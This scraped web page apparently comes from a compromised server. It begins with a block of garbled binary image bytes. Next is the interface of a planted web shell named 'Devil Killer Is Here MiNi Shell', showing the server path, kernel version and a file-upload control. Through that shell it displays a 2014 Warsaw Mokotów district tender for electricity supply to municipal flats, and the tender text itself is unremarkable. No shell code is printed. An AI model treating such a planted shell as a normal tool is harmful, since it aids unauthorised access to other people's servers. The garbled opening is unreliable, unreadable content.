JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140211/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140211/47664-N-2014.html

<p class="kh_header"><b>Warszawa: Sprzedaż energii elektrycznej do lokali mieszkalnych znajdujących się w budynkach administrowanych przez ZGN w Dzielnicy Mokotów m. st. Warszawy   
w okresie do dnia 31.12.2014r.</b><br>
<b>Numer ogłoszenia: 47664 - 2014; data zamieszczenia: 11.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarowania Nieruchomościami w dzielnicy Mokotów m.st. Warszawy , ul. Irysowa 19, 02-660 Warszawa, woj. mazowieckie, tel. 022 5493727, 5493737, faks 022 5493737.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zgnmokotow.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sprzedaż energii elektrycznej do lokali mieszkalnych znajdujących się w budynkach administrowanych przez ZGN w Dzielnicy Mokotów m. st. Warszawy   
w okresie do dnia 31.12.2014r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I.  Opis przedmiotu zamówienia oraz warunki jego realizacji.
1. Przedmiotem zamówienia jest sprzedaż energii elektrycznej w rozumieniu 
       ustawy Prawo energetyczne (Dz.U. z 2006 r. Nr 89 poz. 625 z późn. zm.), zwanej dalej 
       sprzedażą energii elektrycznej, w planowanej  ilości do lokali mieszkalnych w 
       Warszawie na terenie Dzielnicy Mokotów : 
      Puławska 140 lokal mieszkalny nr 2 - na potrzeby techniczne i eksploatacyjne  
        - 3000kWh dla 1 punktu poboru - grupa taryfowa G11,
       Ksawerów 10 m lokal mieszkalny nr 14 - na potrzeby techniczne i eksploatacyjne 
        - 3000kWh dla 1 punktu poboru - grupa taryfowa G11, 
       Pytlasińskiego 15 lokal mieszkalny nr 3 - na potrzeby techniczne i eksploatacyjne -   
       1000kWh dla jednego punktu poboru - grupa taryfowa G11,
       Pytlasińskiego 15 lokal mieszkalny nr 27 - na potrzeby techniczne i eksploatacyjne -   
       1000kWh dla jednego punktu poboru - grupa taryfowa G11,
       Pytlasińskiego 15 lokal mieszkalny nr 41 - na potrzeby techniczne i eksploatacyjne -   
        1000kWh dla jednego punktu poboru - grupa taryfowa G11,
      Pytlasińskiego 15 lokal mieszkalny nr 42 - na potrzeby techniczne i eksploatacyjne -   
        1000kWh dla jednego punktu poboru - grupa taryfowa G11,
       Wygoda 5 lokal mieszkalny nr 11 - na potrzeby techniczne i eksploatacyjne -   
        3000kWh dla jednego punktu poboru - grupa taryfowa G11,
      należących do m.st. Warszawy, będących w administracji Zakładu Gospodarowania   
      Nieruchomościami w Dzielnicy Mokotów, zgodnie z  warunkami zawartymi w niniejszej 
      Specyfikacji Istotnych Warunków Zamówienia zwanej dalej SIWZ okresie do dnia 31 
      grudnia 2014 r.  
Szczegółowy opis przedmiotu zamówienia
Szczegółowe informacje dot. poszczególnych punktów poboru znajdują się w zestawieniu zbiorczym stanowiącym ROZDZIAŁ IV specyfikacji istotnych warunków zamówienia będącym również załącznikiem nr 1 do umowy sprzedaży energii elektrycznej.
Wskazane ilości energii są szacunkowe i posiadają wyłącznie zastosowanie kalkulacyjne, nie stanowią zobowiązania Zamawiającego do jej zakupu. Rzeczywista ilość zakupionej energii w trakcie realizacji umowy wynikać będzie wyłącznie z bieżących potrzeb Zamawiającego. Energia elektryczna powinna spełniać standardy techniczne zgodnie z zapisami ustawy Prawo energetyczne oraz rozporządzeniami wykonawczymi do tej ustawy i Polskimi Normami.
3.2. Wykonawca wyłoniony w postępowaniu w imieniu i na rzecz Zamawiającego wykonana   
       następujące czynności w odniesieniu do punktów poboru energii elektrycznej:
       a) Zgłosi Operatorowi Systemu Dystrybucyjnego zw. OSD do realizacji zawartą umowę    
            sprzedaży energii elektrycznej.
       b) Składa oświadczenie woli w zakresie wypowiadania dotychczas obowiązującej  
            umowy sprzedaży energii elektrycznej i świadczenia usług dystrybucji (umowa 
            kompleksowa) bądź umowy sprzedaży energii elektrycznej dotychczasowemu 
            sprzedawcy energii elektrycznej.
       c) Reprezentuje Zamawiającego przed właściwym OSD w sprawach związanych z 
           zawarciem umowy o świadczenie usług dystrybucji, z uwzględnieniem wskazanych 
           poniżej taryf oraz mocy umownych dla poszczególnych obiektów.
       d) Występuje do OSD o zmianę grupy taryfowej i/lub mocy umownej dla wskazanych 
            poniżej poszczególnych obiektów Zamawiającego.
       e) Reprezentuje Zamawiającego w kontaktach z dotychczasowym Sprzedawcą
           energii elektrycznej lub Operatorem Systemu Dystrybucji w sprawach związanych z 
           procesem zmiany Sprzedawcy.     
       f) Zawiera w imieniu Zamawiającego umowy o świadczenie usług dystrybucji z 
           Operatorem Systemu Dystrybucyjnego.
  3.3. 	Zamawiający zastrzega sobie możliwość wprowadzenia zmian postanowień umowy 
      o ile warunkiem wprowadzenia takich zmian będą między innymi okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub zmiany te będą korzystne dla Zamawiającego. Zamawiający dopuszcza możliwość zmiany umowy w szczególności w następujących przypadkach:
a) zmiany regulacji prawnych wprowadzonych w życie po dacie zawarcia umowy          wraz ze skutkami takiej zmiany regulacji prawnych;
b) ograniczenia środków budżetowych na realizację Przedmiotu niniejszej umowy;
c) ograniczenia zakresu rzeczowego i finansowego umowy;
d) zmiany terminu wykonania umowy, pod warunkiem, że zaszły okoliczności , których 
   nie można było przewidzieć w chwili zawarcia umowy a w szczególności gdy 
   realizowane jest zamówienie uzupełniające oraz w przypadku wydłużających się 
   procedur uzyskania niezbędnych uzgodnień w jednostkach miejskich o czas uzyskania
   w/w uzgodnień;
e) zmiany wykazu budynków stanowiącego Rozdział IV siwz
3.4.  Zmiana umowy wymaga sporządzenia aneksu w formie pisemnej pod rygorem  
          nieważności.

2.   Zamawiający nie przewiduje udzielania zaliczek na poczet wykonania zamówienia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 09.30.00.00-2, 65.30.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga zabezpieczenia oferty wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Zamawiający oceni jako spełniony warunek posiadania uprawnień do wykonywania określonej działalności lub czynności na podstawie posiadania przez Wykonawcę aktualnej koncesji wydanej przez Prezesa Urzędu Regulacji Energetyki na obrót energią elektryczną,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu dokonywania oceny spełnienia   
                              warunku i za spełnienie tego warunku uzna złożenie oświadczenia, o 
                              którym mowa w pkt. 9.2.1.  siwz.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni jako spełniony warunek dysponowania odpowiednim potencjałem technicznym  na podstawie posiadania przez Wykonawcę aktualnej umowy zawartej z operatorem systemu dystrybucyjnego. 
Za spełnienie tego warunku Zamawiający uzna złożenie oświadczenia, o którym mowa w pkt 9.2.3. SIWZ na załączniku nr 3 do oferty wg wzoru załączonego do wzoru formularza oferty.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu dokonywania oceny spełnienia   
                              warunku i za spełnienie tego warunku uzna złożenie oświadczenia, o 
                              którym mowa w pkt. 9.2.1.  siwz.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu dokonywania oceny spełnienia  
                          warunku i za spełnienie tego warunku uzna złożenie oświadczenia, o którym  
                          mowa w pkt. 9.2.1.  siwz.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>I. Warunki udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków.

1. W postępowaniu mogą wziąć udział Wykonawcy nie wykluczeni z postępowania na podstawie art. 24 ust. 1  i ust. 2 pkt. 5. ustawy z dnia 29 stycznia 2004 r. Prawo Zamówień Publicznych (tekst jedn. Dz. U. z 2013 r. poz. 907 ze zm.), a także spełniający warunki, o których mowa w art. 22 ust. 1 pkt. 1 - 4 ww ustawy dotyczące: 
a) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, t.j. posiadają aktualną koncesję wydaną przez Prezesa Urzędu Regulacji Energetyki na obrót energią elektryczną oraz posiadają zawartą umowę z Operatorem Systemu Dystrybucyjnego na rejon miasta Warszawy na którym położone są obiekty Zamawiającego wymienione w rozdz. I pkt 3 SIWZ.
b) posiadania wiedzy i doświadczenia,
c) 	dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia,
d) 	sytuacji ekonomicznej i finansowej.
         Ocena spełnienia warunków zostanie dokonana na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu stanowiącego załącznik nr 1 do wzoru formularza oferty (pkt. 9.2.1. specyfikacji istotnych warunków zamówienia) oraz w oparciu o potwierdzenie spełniania warunków w zakresie wskazanym poniżej:
Ad. posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania:
  1.1. Zamawiający oceni jako spełniony warunek posiadania uprawnień do wykonywania określonej działalności lub czynności na podstawie posiadania przez Wykonawcę aktualnej koncesji wydanej przez Prezesa Urzędu Regulacji Energetyki na obrót energią elektryczną,
         Ad. posiadania wiedzy i doświadczenia:
                   1.2. Zamawiający nie dokonuje opisu sposobu dokonywania oceny spełnienia   
                              warunku i za spełnienie tego warunku uzna złożenie oświadczenia, o 
                              którym mowa w pkt. 9.2.1.  siwz. 
         Ad.  dysponowania odpowiednim potencjałem technicznym,
  1.3. Zamawiający oceni jako spełniony warunek dysponowania odpowiednim potencjałem technicznym  na podstawie posiadania przez Wykonawcę aktualnej umowy zawartej z operatorem systemu dystrybucyjnego. 
Za spełnienie tego warunku Zamawiający uzna złożenie oświadczenia, o którym mowa w pkt 9.2.3. SIWZ na załączniku nr 3 do oferty wg wzoru załączonego do wzoru formularza oferty.
 Ad.    dysponowania osobami zdolnymi do wykonania zamówienia,
1.4.Zamawiający nie dokonuje opisu sposobu dokonywania oceny spełnienia   
                              warunku i za spełnienie tego warunku uzna złożenie oświadczenia, o 
                              którym mowa w pkt. 9.2.1.  siwz. 
       Ad.   sytuacji ekonomicznej i finansowej,
                1.5. Zamawiający nie dokonuje opisu sposobu dokonywania oceny spełnienia  
                          warunku i za spełnienie tego warunku uzna złożenie oświadczenia, o którym  
                          mowa w pkt. 9.2.1.  siwz. 

     1.6. 	Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie podmiotów, oddających do dyspozycji Wykonawcy niezbędne zasoby na okres korzystania z nich przy wykonaniu zamówienia, w formie oryginałów. 
Zamawiający wymaga aby składany dokument-dokumenty dotyczyły w szczególności:
-zakresu dostępnych Wykonawcy zasobów innego podmiotu - informację wskazującą, który konkretny zasób jest udostępniany. W przypadku udostępniania osób zdolnych do wykonania zamówienia należy imiennie wskazać osoby, które będą uczestniczyć w wykonaniu zamówienia. W przypadku udostępnienia wiedzy i doświadczenia należy wskazać konkretną formę uczestnictwa w realizacji zamówienia (np. podwykonawstwo, doradztwo, itp.). W przypadku udostępnienia potencjału technicznego należy wskazać przekazanie do dyspozycji Wykonawcy narzędzia, wyposażenie zakładu, urządzeń technicznych lub na zasadzie podwykonawstwa. W przypadku udostępnienia zdolności finansowych  przeniesienie własności pieniędzy lub pozostawienie do dyspozycji  Wykonawcy środków pieniężnych albo ponoszenie solidarnej odpowiedzialności za finansowanie nakładów + wykazanie, iż podmiot trzeci posiada środki finansowe lub zdolność kredytową w niezbędnym rozmiarze.

-sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia.

-charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem. 

-zakresu i okresu udziału innego podmiotu  przy wykonywaniu zamówienia,

Jeżeli Wykonawca, wykazując spełnienie warunków, o których mowa w art. 22 ust. 1 ustawy polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, Zamawiający żąda wykazania za pomocą dokumentów wymaganych w pkt. 9.3 i 9.4. specyfikacji istotnych warunków zamówienia, iż w stosunku do tych podmiotów nie zachodzą okoliczności wskazane w art. 24 ust. 1 ustawy, o ile podmioty te będą brały udział w realizacji części zamówienia. W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia warunki, o których mowa w art. 22 ust. 1 mogą być spełnione  łącznie.  

1.7.  Ocena spełnienia warunku nie podlegania wykluczeniu na podstawie art. 24ust. 1 w/w ustawy pzp z postępowania  zostanie dokonana na podstawie oświadczenia Wykonawcy o braku podstaw do wykluczenia stanowiącego załącznik nr 2 do wzoru formularza oferty oraz na podstawie dokumentów przedłożonych przez Wykonawcę, o których mowa w pkt. 9.3.  siwz i lub 9.7. siwz.

1.8. Ocena spełnienia warunku nie podlegania wykluczeniu na podstawie art. 24 ust. 2 pkt. 5 ww ustawy pzp z postępowania  zostanie dokonana na podstawie złożenia przez Wykonawcę listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt. 5 ustawy pzp lub informacji o braku przynależności do grupy kapitałowej - wzór druku stanowi załącznik nr 4 do siwz.          

1.9. 	Wypełnienie przez Wykonawcę formularza oferty oraz spełnienie innych wymagań określonych w specyfikacji istotnych warunków zamówienia będzie stanowiło podstawę oceny ofert. Zamawiający żąda, żeby Wykonawca wykazał, nie później niż na dzień składania ofert, spełnianie warunków, o których mowa w pkt. 8.  siwz.

1.10. 	Zamawiający wykluczy z postępowania Wykonawcę, w stosunku do którego stwierdzono podstawę wykluczenia z postępowania o udzielenie zamówienia w okolicznościach, o których mowa w art. 24 ust. 1 i art. 24 ust. 2 pkt. 5 ustawy Prawo Zamówień Publicznych oraz tego, który nie spełnia wymaganych warunków oraz jeśli stwierdzi, że dostarczone przez niego informacje mające wpływ lub mogące mieć wpływ na wynik prowadzonego postępowania są nieprawdziwe.

2. Oferta oraz dokumenty i oświadczenia, wymagane w postępowaniu 
2.1. Wykonawca musi dołączyć do oferty w terminie wskazanym w pkt. 15.1.  specyfikacji istotnych warunków zamówienia i w formie określonej w  specyfikacji:
             2.1.1.  wypełniony i podpisany formularz oferty zgodny w treści ze wzorem stanowiącym Rozdział II specyfikacji istotnych warunków zamówienia,
2.1.2. oryginał lub kopia poświadczona za zgodność z oryginałem przez notariusza pełnomocnictwa, o którym mowa w pkt. 9.5.1.2. niniejszej specyfikacji, jeżeli oferty będą składali Wykonawcy wspólnie ubiegający się o udzielenie zamówienia,
2.1.3. oryginał lub kopia poświadczona za zgodność z oryginałem przez notariusza pełnomocnictwa, o którym mowa w pkt. 14.6.3. niniejszej specyfikacji, jeśli oferta będzie podpisana przez pełnomocnika,
2.1.4. informację o części - częściach zamówienia, które Wykonawca zamierza powierzyć podwykonawcom, o ile Wykonawca będzie realizował zamówienie z udziałem podwykonawców,
   2.1.5. informację podmiotów i o podmiotach, które będą brały udział w realizacji  części zamówienia i na  zasobach których polega wykonawca, na zasadach określonych w pkt. 8.2. specyfikacji istotnych warunków zamówienia, 
  2.1.6. informacji określonej w pkt. 16.1.1. niniejszej specyfikacji w przypadku zastosowania  przez wykonawcę innej niż (23 %) stawki podatku od towarów i usług, 
2.2.   W celu wykazania spełniania przez Wykonawcę warunków udziału w postępowaniu, o  których mowa w pkt. 8 specyfikacji istotnych warunków zamówienia, Wykonawca zobowiązany jest złożyć wraz z ofertą następujące dokumenty: 
2.2.1. oświadczenie na załączniku nr 1 do oferty wg wzoru załączonego do wzoru formularza oferty, że spełnia warunki określone w art. 22 ust.1 ustawy Prawo zamówień publicznych,
2.2.2. aktualną koncesję wydaną przez Prezesa Urzędu Regulacji Energetyki na prowadzenie działalności w zakresie obrotu energią elektryczną,
2.2.3. Oświadczenie o posiadaniu zawartej umowy o świadczenie usług dystrybucji
energii elektrycznej z operatorem systemu dystrybucyjnego działającym na terenie Warszawy na których znajdują się obiekty wymienione w rozdz. I pkt 3 specyfikacji siwz: 
Ww oświadczenie dotyczące posiadania przez Wykonawcę aktualnej umowy zawartej z operatorem systemu dystrybucyjnego, na załączniku nr 3 do oferty wg wzoru załączonego do wzoru formularza oferty,
   2.2.4. W przypadku gdy Wykonawca polegać będzie na doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu (w oryginale): 
            2.2.4.1.  pisemne zobowiązanie tych podmiotów do zrealizowania części zamówienia zawierające zakres robót, które te podmioty zobowiązują się wykonać i konkretną formę uczestnictwa w realizacji zamówienia (np. podwykonawstwo, doradztwo, itp.) - w przypadku gdy Wykonawca wykazując spełnienie warunku udziału w postępowaniu polega na wiedzy i doświadczeniu innych podmiotów zakresie realizacji części zamówienia.
            2.2.4.2.  pisemne zobowiązanie tych podmiotów do oddania do dyspozycji Wykonawcy osób, które będą uczestniczyć w realizacji zamówienia, zawierające także imienną listę tych osób - w przypadku gdy Wykonawca wykazując spełnienie warunku udziału w postępowaniu polega na osobach zdolnych do wykonani zamówienia innych podmiotów.
           2.2.4.3. inne dokumenty i oświadczenia, zgodnie z wymogiem pkt. 8.2. SIWZ.

2.3. 	W celu wykazania braku podstaw do wykluczenia z postępowania  o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 ustawy, Wykonawca zobowiązany jest złożyć wraz z ofertą:
2.3.1.  oświadczenie na załączniku nr 2 do oferty wg wzoru załączonego do wzoru formularza oferty o braku podstaw wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 ustawy Prawo Zamówień Publicznych,  
2.3.2. aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, 
       2.4. W celu wykazania braku podstaw do wykluczenia z postępowania  o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 24 ust. 2 pkt. 5  ustawy, Wykonawca zobowiązany jest złożyć wraz z ofertą:
              2.4.1. listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt. 5 ustawy pzp lub informację o braku przynależności do grupy kapitałowej - wzór druku stanowi załącznik nr 4 do oferty wg wzoru załączonego do wzoru formularza oferty.
2.5. W celu potwierdzenia że oferowane usługi odpowiadają wymaganiom określonym przez Zamawiającego  w SIWZ; 
